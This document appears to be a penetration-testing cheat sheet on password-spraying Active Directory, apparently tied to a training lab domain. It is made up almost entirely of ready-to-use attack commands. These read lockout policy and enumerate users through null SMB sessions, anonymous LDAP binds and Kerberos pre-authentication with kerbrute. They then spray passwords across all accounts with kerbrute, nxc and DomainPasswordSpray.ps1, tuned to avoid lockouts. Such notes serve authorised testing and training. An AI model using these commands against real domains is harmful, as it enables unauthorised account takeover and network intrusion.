Password Spraying Attack
Try single passwords on all users, less chance of lockout.
Policy Password
Important to obtain password policy, with:
Lockout threshold
Possible attempts before being blocked
Lockout duration
Duration of the block
Lockout observation window
After how long does the reset of attempts occur
Locally
Remotely
nxc smb <IP> -u <USER> -p <PASS> --pass-pol
enum4linux -u <USER> -p <PASS> -P <IP>
Null Session SMB
nxc smb <IP> --pass-pol
enum4linux -P <IP>
LDAP Anonymous Binds
ex. INLANEFREIGHT.LOCAL
ldapsearch -h <IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
Find Usernames
Locally
Remotely
nxc smb <IP> -u <USER> -p <PASS> --users
enum4linux -u <USER> -p <PASS> -U <IP>
Null Session SMB
nxc smb <IP> --users
enum4linux -U <IP>
LDAP Anonymous Binds
ex. INLANEFREIGHT.LOCAL
ldapsearch -h <IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f 2 -d " "
windapsearch.py --dc-ip <IP> -u "" -U
Brute Force
Use Kerberos Pre-Authentication to enumerate users via brute force (no login errors and no lockouts).
kerbrute userenum -d <DOMAIN> --dc <IP_DC> <WORDLIST>
Spraying Attack
This method is based on obtaining TGT for credential verification. The advantage is that it uses only two UDP frames (sends REQ-TGT and examines the response)
kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> <USERS_LIST> <PASS>
Remove users who generate errors from wordlists.
This method uses the SMB protocol to verify credentials (more traffic and slower).
nxc smb <IP> -u <USERS_LIST> -p <PASS1> <PASS2> -d <DOMAIN> --continue-on-success | grep +
From Windows, with the ability to extract the password policy itself (adapting the attack) and users if it is executed from hosts within the domain.
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password <PASS> -ErrorAction SilentlyContinue [-UserList <USERS> -Domain <DOMAIN>]
Last updated